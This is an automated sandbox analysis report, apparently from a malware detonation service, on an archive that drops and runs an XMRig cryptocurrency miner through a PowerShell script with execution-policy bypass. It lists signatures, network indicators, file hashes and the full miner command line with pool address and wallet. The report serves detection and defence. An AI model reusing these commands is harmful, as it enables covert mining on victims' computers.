Analysis Overview
SHA256
08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Threat Level: Known bad
The file main2.rar was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious behavior: LoadsDriver
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-27 00:27
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:05
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1786s
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2456 wrote to memory of 4716 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2456 wrote to memory of 4716 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.178.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x4zik25g.mf2.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2456-25-0x00007FFE43C80000-0x00007FFE4466C000-memory.dmp
memory/2456-48-0x0000011AEE3A0000-0x0000011AEE3B2000-memory.dmp
memory/2456-61-0x0000011AEE060000-0x0000011AEE06A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:24
Platform
win11-20240426-en
Max time kernel
1792s
Max time network
1788s
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3812 wrote to memory of 3908 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3812 wrote to memory of 3908 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 52.111.229.19:443 | | tcp |
Files
memory/3812-0-0x00007FFA43393000-0x00007FFA43395000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kjuujoal.pbq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:37
Platform
win11-20240426-en
Max time kernel
1797s
Max time network
1797s
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 708 wrote to memory of 1680 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 708 wrote to memory of 1680 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
memory/708-0-0x00007FFE8C563000-0x00007FFE8C565000-memory.dmp
memory/708-10-0x00007FFE8C560000-0x00007FFE8D022000-memory.dmp
memory/708-9-0x00000277FC040000-0x00000277FC062000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l5ocps2o.2n2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/708-11-0x00007FFE8C560000-0x00007FFE8D022000-memory.dmp
memory/708-12-0x00007FFE8C560000-0x00007FFE8D022000-memory.dmp
memory/708-14-0x00000277FC550000-0x00000277FC562000-memory.dmp
memory/708-15-0x00000277FC420000-0x00000277FC42A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral22
Detonation Overview
| Submitted | 2024-05-27 00:27 |
| Reported | 2024-05-27 01:41 |
| Platform | win10-20240404-en |
| Max time kernel | 1797s |
| Max time network | 1774s |
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1260 wrote to memory of 3768 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1260 wrote to memory of 3768 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0nmop00k.hcc.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral23
Detonation Overview
| Submitted | 2024-05-27 00:27 |
| Reported | 2024-05-27 01:42 |
| Platform | win10v2004-20240508-en |
| Max time kernel | 1792s |
| Max time network | 1766s |
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 400 wrote to memory of 4732 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 400 wrote to memory of 4732 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yascaaha.oa1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral1
Detonation Overview
| Submitted | 2024-05-27 00:27 |
| Reported | 2024-05-27 01:03 |
| Platform | win11-20240508-en |
| Max time kernel | 1789s |
| Max time network | 1744s |
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3272 wrote to memory of 4148 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3272 wrote to memory of 4148 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b2myqdn3.jjh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:24
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1765s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
